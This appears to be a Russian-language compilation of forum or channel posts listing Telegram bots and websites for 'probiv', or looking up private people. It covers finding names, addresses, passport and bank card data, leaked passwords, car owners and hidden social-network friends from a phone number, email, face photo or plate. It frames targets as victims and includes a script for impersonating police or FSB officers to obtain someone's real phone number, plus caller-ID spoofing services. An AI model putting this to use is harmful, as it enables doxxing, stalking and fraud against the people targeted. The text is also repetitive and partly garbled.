По запрашиваемому номеру телефона выдает ссылку на личность в Фэйсбуке.
Функционал бесплатный.
@buzzim_alerts_bot
Поисковая система по платформе Telegram. Ищет упоминания ников/каналов в чатах
статьях. Присутствует функция оповещения, если что-то где-то всплывёт.
Например, можно посмотреть какие каналы разнесли твои посты с Хабра, проверить
ник юзера, где он еще трепался (не забывайте часто менять или на… убрать ваш
ник в Tg). Скрина нет – много замазывать. Функционал бесплатный.
@krnshowtimebot
Бот позволяет проверить ip в блэк-листе РКН. Бот вроде сдох, но может очнется.
@AvinfoBot
Бот, который по вводу мобильного телефона выдаст номер машины/марку, а также
ссылку и все объявления на Avito.ru. В демо-режиме бесплатно доступно
несколько таких поисков/отчетов. Ценник за функционал приличный, некоторые
хитрожопые юзеры только ради этого бота сбрасывают свой аккаунт в Telegram,
чтобы бесплатно пробивать своих жертв (бесконечное удаление/регистрация учетки
на один и тот же номер телефона). БД Avito – или проданная или сдёрнутая, в
любом случае хочется дать им в Авито по ИБ.
@HowToFind_bot
Бот разведчик. Подскажет секреты/приемы OSINT.
@Smart_SearchBot
Отличный бот, очень полный. Помогает найти дополнительную информацию,
относительно телефонного номера, id ВКонтакте, email, или ИНН юр./физ. лица.
getcontact_real_bot - идеально подойдёт для проверки номера(вирт или не вирт)
@UsersSearchBot - найдет не мало хорошей информации по номеру, так же возможны
другие методы поиска
@detectiva_bot - найдет информации по номеру и другим методам поиска(так же по
номеру ищет соц-сети)
@vk2017robot - найдет информации по странице которая была зарегестрироваться в
17 и ранее году
@EyeCultist_bot - зеркало оригинального глаза бога
@n3fm4xw2rwbot - найдет информацию по почте, номеру, авто
@BotAvinfo_bot - найдет информации по авто
@helper_inform_bot - найдет чу чуть информации по номеру, так же присутствуют
разные методы пробива
@Quickosintfast_bot - зеркало осинта. находит информации по чему угодно,
только придется чу чуть оплачивать поиск
@vin01bot - найдет информации по ГОС или VIN номеру
@TgAnalyst_bot - найдет всю возможную информацию по айди телеграмм аккаунта
@Zernerda_bot - соберёт много информации по номеру телефона
@ip_score_checker_bot - найдет информации по айпи человека
@maigret_osint_bot - найдет информации по юзернейму телеграмм аккаунта
@UniversalSearchRobot - найдет информации по номеру телефона
@CultustDoxed_bot - зеркало баз ГТА
@PasswordSearchBot - найдет утерянные пароли в базах
@usinfobot - находит информации по юзеру/айди
@clerkinfobot - находит информации разными методами
@last4mailbot - найдет много полезной инфы по электронной почте
@HimeraSearchBot - очень много методов поиска, а так же информации
@eyeofbeholder_bot - найдет информации по айди/юзернейму
поиск через URLh:
ttps://my-medon.aviasales.ru/list?key=tg:123456789 - найдет подписки на авиабилеты, замените 123456789 на ID аккаунта
ttps://etlgr.me/conversations/123456789/subscription - найдет сохраненное имя аккаунта и статус подписки на @etlgr_bot, можно подставить к ID @etlgr.com и получить Email адрес, замени 123456789 на ID аккаунта
https://intelx.io/?s=https/t.me/USERNAME - найдет упоминание на сайтах и в слитых базах, замените USERNAME на имя пользователя
пробив по почте:
haveibeenpwned.com - проверка почты в слитых базах
emailrep.io - найдет на каких сайтах был зарегистрирован аккаунт использующий определенную почту
dehashed.com (r) - проверка почты в слитых базах
intelx.io - многофункциональный поисковик, поиск осуществляется еще и по даркнету
@info_baza_bot - покажет из какой базы слита почта, 2 бесплатных скана
leakedsource.ru - покажет в каких базах слита почта
mostwantedhf.info - найдет аккаунт skype
email2phonenumber (t) - автоматически собирает данные со страниц восстановления аккаунта, и находит номер телефона
spiderfoot.net (r) - автоматический поиск с использованием огромного количества методов, можно использовать в облаке если пройти регистрацию
@last4mailbot - бот найдет последние 4 цифры номера телефона клиента Сбербанка
searchmy.bio - найдет учетную запись Instagram с электронной почтой в описании
AVinfoBot (r) - найдет аккаунт в ВК
account.lampyre.io (t, r) - программа выполняет поиск по аккаунтам в соц. сетях и мессенджерам и другим источникам
ГлазБога.com (r) - найдет фото из аккаунтов пользователя
@StealDetectorBOT - поисковик по базам утечек, найдет частть пароля и источник утечек
cyberbackgroundchecks.com - найдет все данные гражданина США, вход на сайт разрешен только с IP адреса США
holehe (t) - инструмент проверяет аккаунты каких сайтов зарегистрированы на искомый email адрес, поиск по 30 источникам
tools.epieos.com - найдет Google ID, даст ссылки на профиль в Google карты, альбомы и календарь, найдет к каким сайтам привязана почта, профиль LinkedIn
@UniversalSearchBot - найдет профили на Яндекс, в сервисах Google, утекшие пароли, социальные сети, адрес регистрации, номер телефона, био, Gmail адрес и прочее
grep.app - поиск в репозиториях GitHub
@PasswordSearchBot - выдает пароли
@PhoneLeaks_bot - найдет в каких базах слит номер
@infobazaa_bot - найдет в слитых базах фио, адрес.
LeakedInfoBot - Самый популярный бот для поиска слитой информации о человеке.
Находит практический всю доступную информацию о физических и юридических лицах
из государственных баз данных, взломанных баз социальных сетей, из других
публичных платформ и источников. Бот оснащён самыми актуальными базами данных.
А так же подключён к базе солярис, что дает ещё большую вероятность найти
человека именно там.
@UsersSearchBot – очень крутой бот для поиска по ФИО, нику, номеру телефона,
email или профилю в соцсетях. Содержит базы данных практический всех
нашумевших взлом. Поиск по Sherlock. Рекомендуем!
quick OSINT bot – информация о человеке по номеру
телефона, email или профилю в соцсетях, фотографии.
@UniversalSearchBot - бот предназначенный для поиска исключительно открытой
информации по таким запросам, как: номер телефона, адрес электронной почты,
госномер автомобиля, имя пользователя, IP-адрес, доменное имя, геолокация,
фотография, ID Telegram и ВКонтакте. Прекрасно автоматизирует OSINT.
@palantir_rubot - бот для глубокого пробива. Самый дорогой из всех, но
периодически дает феноменальные результаты: где человек лечился, куда летал
самолетом и т.п.
@maigret_osint_bot – проверка username. Maigret проверяет наличие
зарегистрированного пользователя с конкретным никнеймом среди 1366 различных
сайтов. За основу был взят инструмент Sherlock, который создатель бота начал
развивать.
@Search_firm_bot - бот осуществляет поиск по организациям, банкам, почтовому
индексу.
@egrul_bot - быстрый сервис проверки контрагентов. Только легальные данные.
(Бесплатный)
@ShtrafKZBot - проверка штрафов/налогов/пени по ИИН/БИН - штрафов ПДД по гос.
номеру и номеру техпаспорта.
@AvitoBot - поиск пользователей Avito по номеру телефона.
@GetGmail_bot – поиск аккаунтов, привязанных к почте Gmail.
Телефоны:
real GetContact bot - GetContact (бесплатный)
@PhoneLeaks_bot - данный бот расскажет о том, в каких утечках и куда был слит
ваш или ещё чей то номер.
@Get_Contectredly_bot и @HackContactBot - с одинаковым функционалом боты,
найдут информацию о номере телефона, ФИО, Email, ищут по telegam ID/username.
@bmi_np_bot - Определение оператора и других данных по номеру телефона.
@numberPhoneBot – Отправь боту номер телефона или фото, и он найден всю
доступную информацию.
@LBSE_bot - Бот-анализатор местоположения мобильного абонента практически
любого мобильного оператора в любой стране мира.
Telegram:
@telesint_bot – позволяет узнать, в каких публичных чатах состоит
пользователь. Сейчас в базе данных бота находится более 179 тысяч публичных
чатов и записи о более чем 45.5 миллионах пользователей.
@tgscanrobot – так же как и предыдущий бот проверяет наличие пользователя в
публичных чатах. На данный момент в базе бота содержится более 709 тысяч
чатов, 116 миллионов уникальных пользователей.
@username_to_id_bot – позволяет получить ID пользователя, чата, канала или
бота.
@clerkinfobot – поиск по номеру телефона и username Telegram.
@creationdatebot – показывает дату создания аккаунта.
@ChatSearchRobot – поиск схожих по тематике чатов. В базе бота содержится
более 709 тысяч чатов.
Украина:
@ce_poshuk_bot - этот бот осуществляет поиск по ФИО, номеру телефона, номера
авто и ИНН. К сожалению бот ищет информацию только по жителям
@dosiebotua - Бот для поиска информации о жителях Украины
@OpenDataUABot -Бот по поиску информации о копаниях, людях, авто.
@ce_probiv_bot - поиск любой информации ФИО, номеру телефона, номера авто и
ИНН и тд.
пробив по вк:
@vkfindface_bot - Бот для поиска профиля человека Вконтакте по его фото.
@InfoVkUser_bot – анализ друзей профиля ВК. Сейчас доступны ВУЗы и родные
города.
@VKUserInfo_bot – выдает полную инфу о профиле ВК.
для других соц-сетей:
@InstaBot – скачивает любые медиафайлы из Instagram.
@SaveYoutubeBot – ищет и скачивает ролики из YouTube.
@getfb_bot – поиск страницы в Facebook по номеру телефона.
Домены:
@WhoisDomBot – отображает whois-инфу для домена или IP-адреса.
@iptools_robot – умеет искать уязвимости на сайтах, собирать информацию про IP
и домены, искать субдомены и многое другое.
@AVinfoBot - проверка истории подержанного автомобиля по госномеру, VIN,
телефону продавца.
по аккаунту
1. searchlikes.ru — найдет где есть лайки и комментарии пользователя, дает
статистику друзей
2. ininterests.com
(https://ininterests.com/Люди)
— архивная копия аккаунта несколько лет назад
3. 220vk.com — определит средний возраст друзей, скрытых друзей, города
друзей, дата регистрации и т.д
4. vk5.city4me.com — cтатистика онлайн активности, скрытые друзья
5. VKAnalysis (https://github.com/migalin/VKAnalysis) — анализ круга
общения, текста, фото, активности и интересов аккаунта
6. cipher387.github.io
(https://cipher387.github.io/quickcacheandarchivesearch/) — покажет
архивированную версию аккаунта, даст 20+ прямых ссылок на сайты веб архивы
7. InfoApp (https://vk.com/app7183114) —найдет созданные группы, упоминания
в комментариях, общих друзей, созданные приложения и комментарии к фото
8. @InfoVkUser_bot — бот покажет наиболее частые места учебы друзей аккаунта
9. @FindNameVk_bot — история изменений имени аккаунта
10. vkdia.com — определит с кем из друзей переписывается человек
11. глазбога.com — бот, найдет фото приватного аккаунта в хорошем качестве,
дату создания
12. vkpt.info — мониторинг деятельности пользователя, поиск старых друзей,
покажет, кому ставит лайки, все комментарии пользователя, скрытые друзья
13. UsersBox.org — бот, находит номер телефона и много других полезных
данных, бесплатный триал 14 дней
14. @SovaAppBot — статистика друзей аккаунта, покажет выборку по городу,
стране, возрасту и полу
15. smartsearchbot.com — бот,находит email, номер телефона и другое,
бесплатный поиск не доступен для новых пользователей
16. api.vk.com (https://vk.com/dev/messages.getLastActivity) — покажет дату
последней активности аккаунта
17. @Informator_BelBot — найдёт частые города друзей, общих друзей между
двумя аккаунтами
18. HiddenFriends (https://vk.com/app3256362) — приложение ВК, найдет
скрытых друзей, дождитесь окончания поиска
19. @QuickOSINT_Robot — найдет пароли, соц. сети, логины, телефоны, сделает
анализ друзей и многое другое, всего 3 бесплатных запроса для новых аккаунтов
20. @UniversalSearchRobot
(https://t.me/UniversalSearchRobot#utm?source=0961155457scr=HowToFind) —
найдет аккаунт на Мой Мир, дату изменения, создания и дату последнего статуса
онлайн, архивные копии профиля,упоминание профиля в ВК и прочее
21. @OffThisContactBot — найдет номер телефона, почту, имя, фото, для поиска
создай и подключи свой тг-бот
22. @Zernerda_bot — анализ друзей и знакомых по городу, возрасту, школе,
ВУЗу, лайкам, ищет упоминание профиля в утечках, бесплатный поиск после
первого запуска бота
23. @a11_1n_bot — найдет почту и номер телефона
24. @declassified_bot — найдет адреса регистрации, почту, имя и авто
25. @vk2017robot — профиль вк в 2017 году, покажет аватар, описание и прочее
26. @VKHistoryRobot — история профиля с 2010 по 2021 год, есть даже аватары,
вводить числовой ID страницы
пробив по парсеру:
1. @Informator_BelBot — скачает друзей, сообщества аккаунта
полезные инструменты:
1. @AximoBot — мгновенно сохранит новые публикации аккаунта в Telegram
2. vk-express.ru — слежка за аккаунтом, после добавления будут доступны
аватары, лайки, комментарии, друзья группы и т.д.
пробив по URL:
1. https://onli-vk.ru/pivatfriends.php?id=123456789 — поиск друзей
закрытого аккаунта, замените 123456789 на ID аккаунта VK
2.
https://vk.com/feed?obj=123456789&q=§ion=mentions
— упоминания аккаунта, замените 123456789 на ID аккаунта
3. https://rusfinder.pro/vk/user/id123456789 — сохраненная копия профиля:
имя и город профиля в заголовке страницы, замените 123456789 на ID аккаунта VK
4. https://my.mail.ru/vk/123456789 — найдет аккаунт на Мой Мир, замените
123456789 в ссылке на ID аккаунта
5. https://vk.com/foaf.php?id=123456789 — найдет количество друзей,
количество подписчиков и дату рождения, дату изменения имени и прочее,
замените 123456789 в ссылке на ID аккаунта, откройте исходный код страницы
Ctrl+U
6. https://topdb.ru/username — найдет архивную копию профиля и фото, иногда
нужен VPN, замените username на логин пользователя или ID, например id1234567
7. https://bigbookname.com/user/id-123456789 — историческая копия аккаунта
с фото, друзьями, датой рождения, городом и информацией о себе, замените
123456789 на ID аккаунта VK
8. https://vk.watch/123456789/profile —покажет фото аккаунта с 2016 года,
замените 123456789 на ID аккаунта VK
как узнать настоящий номер человека по виртуальному номеру.
нужно знать виртуальный номер жертвы(без этого никак)
далее нам нужно узнать в каком сервисе он купил виртуальный номер
пишем тех-поддержке сервиса в котором наша жертва покупала номер, что мы являемся сотрудником/помощником и т.п полиции/ФСБ, и пишем что мы якобы ведем расследования по статьям(вам нужно будет написать пр каким статьям, главное чтоб их было не больше 5-7, иначе будет подозрительно), ожидаем ответа. готово! теперь у нас есть оригинальный номер нашей жертвы.
как узнать номер телефона аккаунта ВК через одноклассники:
[1] В ВК добавьте аккаунт в друзья
[2] Перейдите в Одноклассники и откройте раздел мои друзья
[3] Нажмите на кнопку 'добавить друзей из ВК'
[4] Если аккаунт нашелся, то скопируйте ссылку на найденный аккаунт ОК
[5] Перейдите по этой ссылке (https://ok.ru/password/recovery) и выберите
восстановить через профиль
[6] Вставьте в поле ссылку которую вы скопировали на профиль и нажмите искать
В результате вы получите часть номера телефона и e-mail адреса
Как найти друзей приватного аккаунта VK
[1] Скопируйте ID аккаунта у которого хотите узнать друзей
[2] Откройте Google, и вставьте туда этот ID, например: id123456
[3] В результатах поиска откройте такие сайты как facestrana.ru(не реклама)
или boberbook.ru(не реклама) или vkanketa.ru(не реклама) или vkglobal.ru(не
реклама) или другой который похож на эти
[4] На сайте будет анкета другого человека (это один из друзей), скопируйте ID
этого аккаунта (ID в пункте основная информация)
[5] Перейдите по ссылке 220vk.com(не реклама)
(https://220vk.com/commonFriends)[6] В первом поле вставьте ID друга, а во
втором ID приватного аккаунта
[7] Нажмите кнопку "искать общих друзей"
Если друзей не нашлось или их мало, воспользуйтесь ID другого друга из результатов поиска в Google
поиск по паспорту гражданина России:
1. fms.gov.ru (http://services.fms.gov.ru/info-service.htm?sid=2000) —
проверка действительности паспортов гражданина РФ
2. fssp.online — задолженности, поиск бесплатный
3. service.nalog.ru (https://service.nalog.ru/inn.do) — найдет ИНН, нужно
знать полное ФИО и дату рождения
восстановление доступа:
1. esia.gosuslugi.ru (https://esia.gosuslugi.ru/recovery/) — даст часть адреса почты и номера телефона
поиск по фото с лицом:
1. Findclone.ru (r) — найдет профиль ВК
2. AVINFOBOT (https://avclick.me/v/AVinfoBot) — найдет аккаунты в ВК,
просто пришли ему фото с лицом
3. search4faces.com — найдет профиль VK, OK, TikTok и Clubhouse, не точен
4. smartsearchbot.com — бот находит страницу в ВК, бесплатный поиск не
доступен для новых пользователей
5. azure.microsoft.com (<https://azure.microsoft.com/ru-
ru/services/cognitive-services/face/#item2Content-centered>) — соотнесение
лиц, определит вероятность того, что на двух разных изображениях изображен
один и тот же человек, и выдаст оценку достоверности
6. news.myseldon.com — не точен, ищет в фото из СМИ
7. vk.watch — находит аккаунты ВКонтакте с похожими лицами, не точен,
дождитесь загрузки фото
8. @Find_by_face_bot — найдет аккаунт ВК и фото с лицом
9. odyssey-search.info (r) — найдет аккаунт ВК и ОК, при регистрации можно
указать любую российскую организацию, но ваш email чтобы получить логин и
пароль
10. account.lampyre.io (t) (r) — программа способная выдать результаты из
обратного поиска по картине в Google, Yandex, найти похожие лица в аккаунтах
ВК и Одноклассниках
11. @pimeyesbot — найдет фото с лицом во всем интернете, результат приходит в
течении дня
12. @findmekz_bot (r) — найдет фото из ВК, регистрация возможна только
пользователем с номером телефона Казахстана
13. @PinFaceBot — найдет аккаунт ВК, средняя точность поиска
14. /file_image — список ресурсов для поиска по изображению
По видео с лицом
1. scanner.deepware.ai — выявляет дипфейк Quick OSINT — найдет оператора,
email, как владелец записан в контактах, базах данных и досках объявлений,
аккаунты в соц. сетях и мессенджерах, в каких чатах состоит, документы, адреса
и многое другое
@clerkinfobot — бот берет данные из приложения getcontact, показывает как
записан номер телефона в контактах
@dosie_Bot — как и в боте uabaza дает информацио о паспорте только польностью,
3 бесплатные попытки
@find_caller_bot — найдет ФИО владельца номера телефона
@get_caller_bot — поиск по утечкам персональных данных и записным книгам
абонентов, может найти ФИО, дату рождения, e-mail
@get_kolesa_bot — найдет объявления на колеса.кз
@get_kontakt_bot — найдет как записан номер в контактах, дает результаты что и
getcontact
@getbank_bot — дает номер карты и полное ФИО клиента банка
@GetFb_bot — бот находит Facebook
@Getphonetestbot — бот берет данные из приложения getcontact, показывает как
записан номер телефона в контактах
@info_baza_bot — поиск в базе данных
@mailsearchbot — найдет часть пароля
@MyGenisBot — найдет имя и фамилию владельца номера
@phone_avito_bot — найдет аккаунт на Авито
@SafeCallsBot — бесплатные анонимные звонки на любой номер телефона с подменой
Caller ID
@usersbox_bot — бот найдет аккаунты в ВК у которых в поле номера телефона
указан искомый номер
-https://www.reestr-zalogov.ru/search/index
@The_NoNameBot
https://eyeofgod.space/
@EmailPhoneOSINT_bot
@phone_avito_bot
@getcontact_real_bot
ttps://my-medon.aviasales.ru/list?key=tg:123456789
Intelligence X is a search engine and data archive. Search Tor, I2P, data
leaks and the public web by email, domain, IP, CIDR, Bitcoin address and more.
intelx.io
@maigret_osint_bot - Пробив по никнейму
@kolibri_osint_bot - Идеальный бот, аналог ГБ. Бесплатно раздают на время бета
теста (3 месяца вроде).
@glazIX_bot - Стандартный глазик, зеркало от пидорасов извини, своё лень было
делать.
@Qsta_bot - Хороший бот, правда платный. Но дают пару запросов, я лично чекаю
сообщения со страницы вк в нём в группах и т.д. для компромата, охуенный
короче бот
@getcontact_real_bot - Бот для пробива по GetContact (5 запросов в день
)
@ibhldr_bot - Пробив по чатам ТГ
├ @clerkinfobot — бот берет данные из приложения getcontact, показывает как
записан номер телефона в контактах
├ @dosie_Bot — как и в боте uabaza дает информацио о паспорте только
польностью, 3 бесплатные попытки
├ @find_caller_bot — найдет ФИО владельца номера телефона
├ @get_caller_bot — поиск по утечкам персональных данных и записным книгам
абонентов, может найти ФИО, дату рождения, e-mail
├ @get_kolesa_bot — найдет объявления на колеса.кз
├ @getbank_bot — дает номер карты и полное ФИО клиента банка
├ @GetFb_bot — бот находит Facebook
├ @Getphonetestbot — бот берет данные из приложения getcontact, показывает как
записан номер телефона в контактах
├ @info_baza_bot — поиск в базе данных
├ @mailsearchbot — найдет часть пароля
├ @MyGenisBot — найдет имя и фамилию владельца номера
├ @phone_avito_bot — найдет аккаунт на Авито
├ @SafeCallsBot — бесплатные анонимные звонки на любой номер телефона с
подменой Caller ID
Ресурсы для пробива
├ lampyre.io — программа выполняет поиск аккаунтов, паролей и многих других
данных
├ avinfo.guru — проверка телефона владельца авто, иногда нужен VPN
├ fa-fa.kz — найдет ФИО, проверка наличия задолженностей, ИП, и ограничения на
выезд
├ getcontact.com — найдет информацию о том как записан номер в контактах
├ globfone.com — бесплатные анонимные звонки на любой номер телефона
├ mirror.bullshit.agency — поиск объявлений по номеру телефона
├ mysmsbox.ru — определяет чей номер, поиск в Instagram, VK, OK, FB, Twitter,
поиск объявлений на Авито, Юла, Из рук в руки, а так же найдет аккаунты в
мессенджерах
├ nuga.app — найдет Instagram аккаунт, авторизация через Google аккаунт и
всего 1 попытка
├ numberway.com — найдет телефонный справочник
├ personlookup.com.au — найдет имя и адрес
├ phoneInfoga.crvx.fr — определят тип номера, дает дорки для номера,
определяет город
├ spravnik.com — поиск по городскому номеру телефона, найдет ФИО и адрес
├ spravochnik109.link — поиск по городскому номеру телефона, найдет ФИО и
адрес
├ teatmik.ee — поиск в базе организаций, ищет номер в контактах
└ truecaller.com — телефонная книга, найдет имя и оператора телефона
Пробив по странице ВКонтакте
На данный момент в этом посте собраны лучшие способы работы с этой соцсетью, которые используют профессионалы в области OSINT-Разведки.
1 Узнать ID страницы — вам будет необходим этот уникальный идентификатор для
дальнейшего использования.
2 InfoApp — может генерировать ссылки на новостную ленту цели, ее упоминания и
собирать комментарии от имени целей.
3 Тут Найдут — в архиве страницы ВКонтакте могут быть реальная фамилия, дата
рождения и информация об удаленной странице.
4 Поиск друзей закрытого аккаунта — в ссылке нужно заменить XXX на ID страницы
цели.
5 220vk.com — Огромный комбайн для работы с ВК, от поиска закрытых друзей до
мониторинга активности.
В этой статье опубликован список сервисов и ботов для пробива. Сразу скажу что
я регулярно использовал до 10 опубликованых сервисов. Остальных или имеют
хорошую репутацию и я слышал отзывы проверенных людей.
Содержание:
Телеграм боты
Пробив по биткоин кошельку
Поиск по номеру банковской карты
Телеграм боты для пробива
1. Глаз Бога — этот бот уже стал легендой. Если в этом боте нет инфы, то 70%
что в других ее тоже нет. Сервис платный, но покажет часть результата.
2. Поиск по ID –– поисковик информации данных о людях по ID Telegram и
Вконтакте
3. Info Baza –– украинских аналог Глаза Бога. Базы содержат только жителей
Украины!
4. Quick OSINT - может найти комментарии пользователя, проанализировать его
друзей и фотографии
5. Insight –– Бот выдает интересы пользователей по телеграм аккаунту. Вывод
делает на основе базы каналов и чатов на которые подписан пользователь. Если
честно без понятия откуда у них это инфа.
7. Поиск по номеру – поисковая система поиска номеров телефона и других
данных по открытым источникам.
8. BTC Searcher - производит поиск данных о владельце биткоин кошелька.
9. UniversalSearchBot — выдает ссылки на гугл аккаунты, вебархивы, карты
сбербанка, номер телефона, аккаунты яндекса.
10. PasswordSearchBot — показывает пароли по email адресу.
11. Iptools_robot — поиск информации об ip адресе, владельце домена и многое
другое. Больше 30 вариантов поиска.
12. Neuroperson_bot — с помощью нейросетей бот генерирует фото
несуществующего человека и его личные данные, такие как: ФИО, банковские
карты, номер телефона, домашний адрес с индексом и т.д.
13. MotherSearchBot –– поисковик по телеграму.
14. Egrul_bot — присылает информацию о российских компаниях и индивидуальных
предпринимателях.
1. leakcheck.io — найдет слитые пароли
2. Saverudata - може???????те проверить се???????бя или своего
зн???????акомого.
4. dehashed.com — это поисковая машина по взломанным базам данных, созданная
для аналитиков безопасности, журналистов, охранных компаний и обычных людей,
чтобы помочь защитить учетные записи и предоставить информацию о взломах баз
данных и утечках учетных записей. Позволяе вам искать IP-адреса, email адреса,
юзернеймы, имена, номера телефонов, номера VIN, адреса, паролей, хэшей и т.
д.!
5. intelx.io — многофункциональный поисковик, поиск осуществляется еще и по
даркнету. Самая большая в мире база данных. Доступ к сервису стоит 2000 евро в
год. Но можно попользоваться 7 дней ограниченным функционалом.
6. tools.epieos.com — найдет Google ID, даст ссылки на профиль в Google
карты, альбомы и календарь, найдет к каким сайтам привязана почта, профиль
LinkedIn.
7. ininterests.com — информация аккаунта вк несколько лет назад.
8. account.lampyre.io — программа выполняет поиск по аккаунтам в соц. сетях и
мессенджерам и другим источника.
9. hunter.io — найдет профессиональные адреса электронной почты и связаться с
людьми, которые важны для вашего бизнеса.
10. m.ok.ru — показывает часть номера телефона, email, фамилии и полностью
город с датой регистрации, используй во вкладке инкогнито.
11. dolg.xyz — находит связанные лица и государственные органы.
Пробив по биткоин-кошельку
Уже не является секретом, что биткоин не так анонимен, как многие думают.
Баланс кошелька и все его переводы можно легко отследить. Именно для этого
привожу список некоторых сервисов, которые помогут нам в этом
1. Bitref — Проверка биткоин кошелька.
3. Cryptocurrency Alerting — Сервис, позволяющий настроить оповещения об
активности интересующего вас адреса.
4. Blockseer — Визуализация связей между адресами, участвовавшими в
осуществлении транзакций.
Поиск по номеру карты
1. bincheck.io
2. binchecker.com
4. freebinchecker.com
5. binlist.io
Поиск по физическому адресу Украины
1. spravnik.com — найдет номер телефона, ФИО
2. liveuamap.com — отмечены места из новостей с происшествиями,
преступностью, катаклизмами и еще 40 видов событий
3. map.land.gov.ua — кадастровая карта
4. /physical_address — список ресурсов для поиска по физическому адресу любой
страны
Транспорт
1. www.eway.in.ua — общественный транспорт на карте в реальном времени
Просмотр улиц
1. Yandex (http://yandex.ru/maps/) — просмотр в 360 градусов, есть доступ к истории снимков, дополнительные снимки от пользователей
По украинскому гос номеру или VIN авто
1. @OpenDataUABot — поиск по номерному знаку, выдаст VIN, технические
характеристики авто и прочее
2. Traffic Tickets UA
(https://play.google.com/store/apps/details?id=com.shtrafua.android.shtrafua)
(a) — поиск по регистрационному номеру, находит штрафы
3. policy-web.mtsbu.ua — найдет страховой полис, VIN модель и марку
4. www.unda.com.ua — покажет адрес регистрации и
данные автомобиля
5. smartsearchbot.com — бот найдет базовую информацию об авто и ИНН владельца
6. @info_baza_bot — найдет базовую информацию об авто и инициалы владельца
7. @ShtrafyPDRbot — покажет штрафы, необходимо указать серию и номер ВУ или
налоговый номер или серию и номер паспорта или серию и номер свидетельства о
регистрации ТС
8. @SEARCHUA_bot — выдает досье где есть паспорт, адрес проживания, ФИО,
автомобили, родственники, email, номера телефонов и много другого
9. smartsearchbot.com — бот найдет технические характеристики авто и ИНН
владельца, бесплатный поиск не доступен для новых пользователей
10. @ce_probiv_bot — по номерному знаку или VIN даст ИНН и дату рождения
владельца авто
Поиск по характеристикам авто
Например: марка, модель, цвет
1. baza-gai.com.ua (https://baza-gai.com.ua/search) — база с 12M автомобилей, находит регистрационный знак. Можно выбрать область
Поиск по регистрационному знаку или VIN авто в
Россииhttps://avclick.me/v/AVinfoBot
1. AVinfoBot (https://avclick.me/v/AVinfoBot) — дает крупный отчет с
данными владельца, историей авто и фото, получить бесплатный отчет возможно
только если вы пригласите другой аккаунт в бот
2. vin01.ru — найдет VIN и по нему покажет историю регистраций, историю ДТП,
пробег, ОСАГО и многое другое
3. vinformer.su (http://vinformer.su/#cmdt0329976453) — проверка ПТС, поиск
по VIN
4. @AntiParkonBot — найдет номер телефона владельца, маловероятно что
результат будет
5. nomerogram.ru — найдет фото автомобиля, поиск по гос. номеру
6. глазбога.com — находит полис, часть номера телефона, СТС и адреса парковок
в Москве
7. @Quick_OSINT_bot — дает фото авто
8. checkvehicle.sfri.ru
(https://checkvehicle.sfri.ru/AppCheckVehicle/app/main#cmdr0329976453) —
сервис проверки управляемых инвалидом авто или используемых для перевозки
инвалида
9. @clerkinfobot — находит ФИО, VIN, CNC, марку, ОСАГО
10. avtocod.ru — марка, модель, часть VIN
11. ГИБДД.РФ ([https://гибдд.рф/check/auto](https://xn--90adear.xn--
p1ai/check/auto)) — по VIN находит технические характеристики, периоды
владения транспортным средством, участие в дорожно-транспортных происшествиях,
розыск, ограничения, проверка наличия диагностической карты технического
осмотра
12. odyssey-search.info (r) — по номерномузнаку или VIN выдает технические
характеристики авто, VIN, документы и адреса регистрации владельца авто,
направления движения авто и прочее, а при регистрации можно указать любую
российскую организацию
13. smartsearchbot.com — бот находит ФИО, VIN, телефон владельца, марку
автомобиля, бесплатный поиск не доступен для новых пользователей
14. *******.net — покажет фото авто, кто его загрузил на сайт и даату съёмки
Для белорусских документов физических лиц
1. bankrot.gov.by (https://bankrot.gov.by/Debtors/DebtorsList/) — по УНП,
статус банкрота
2. minjust.gov.by (https://minjust.gov.by/directions/enforcement/debtors/)
— по регистрационному номеру, требуется ввести фамилию
3. mtkrbti.by
(http://mtkrbti.by/local/TL/Licence.nsf/WEBSearchView1?SearchView) — по УНП
и номеру лицензии в базе готовых лицензий, найдет ФИО, адрес, почтовый индекс,
номер транспортной лицензии, срок действия
4. nbrb.by (http://www.nbrb.by/system/Banks/GuaranteesRegister/) — по УНП,
покажет сведения о выданных банковских гарантиях
5. gr.rcheph.by (http://gr.rcheph.by/) — по УНП, названию компании или
наименования продукта, поиск в сведениях о государственной регистрации товаров
6. egr.gov.by (http://egr.gov.by/egrn/index.jsp?content=Find) — по УНП в
реестре юридических лиц и индивидуальных предпринимателей единого
государственного регистра
7. justbel.info (https://justbel.info/Liquidation/FindMyRequest) — по УНП,
покажет данные о ликвидации юридических лиц
8. ioauth.raschet.by (https://ioauth.raschet.by/client/password/reset) — по
идентификационному номеру выдаст часть номера телефона
Поиск по ФИО гражданина России
1. @egrul_bot — найдет ИП и компании
2. reestr-zalogov.ru (https://www.reestr-zalogov.ru/search/index) — поиск в
реестре залогодателей, даст паспортные данные, место и дату рождения и т.д.
3. zytely.rosfirm.info (https://zytely.rosfirm.info/m/) — найдет адрес
прописки и дату рождения, необходимо знать город
4. mmnt.ru — найдет упоминания в документах
5. kad.arbitr.ru — найдет дела арбитражных судов
6. bankrot.fedresurs.ru — поиск в реестре банкротов, можно узнать ИНН, СНИЛС
и адрес
7. spra.vkaru.net — телефонный справочник по России, Украине, Белоруссии,
Казахстану, Литве и Молдове
8. fssprus.ru (http://fssprus.ru/iss/ip/) — проверка задолженностей, для
физ. лица
9. reestr-dover.ru (https://www.reestr-dover.ru/revocations) — поиск в
списке сведений об отмене доверенности
10. notariat.ru
(https://data.notariat.ru/directory/succession/search?last_name=петренко&first_name=&middle_name=#)
— поиск в реестре наследственных дел, найдет дату смерти человека и адрес
нотариуса оформившее дело
11. глазбога.com — обратный поиск в GetContact, находит часть номера телефона
12. nalog.ru (https://service.nalog.ru/inn.do) — найдет ИНН, необходимо
указать дату рождения и паспортные данные, дату выдачи не обязательно верно
13. go.mail.ru (https://go.mail.ru/msocial) — ищет аккаунты в VK, OK и
Facebook
14. bigbookname.com (https://bigbookname.com/search#) — находит древние
данные профилей ВК, есть фильтры по дате рождения, по стране и городу
15. notariat.ru (https://notariat.ru/ru-ru/help/probate-cases/) — если
человек умер, то найдет дату смерти, номер наследственного дела, где оно было
открыто и каким нотариусом
16. AVinfoBot (https://avclick.me/v/AVinfoBot) (r) — дает номер телефона,
находит суды и долги
17. wordstat.yandex.ru — покажет что ищут вместе с ФИ или ФИО в Яндексе
18. news.myseldon.com — находит упоминания в российских СМИ, строит дерево
связей между медийными объектами, которое образуются на основе их совместного
упоминания в тексте новости
19. @The_New_Get_Contact_Bot — найдет номер телефона, можно вводить ФИ или
любую другую фразу
20. spravnik.com — найдет номер телефона, адрес регистрации, необходимо знать
город
21. list-org.com (https://www.list-org.com/?search=boss) — найдет
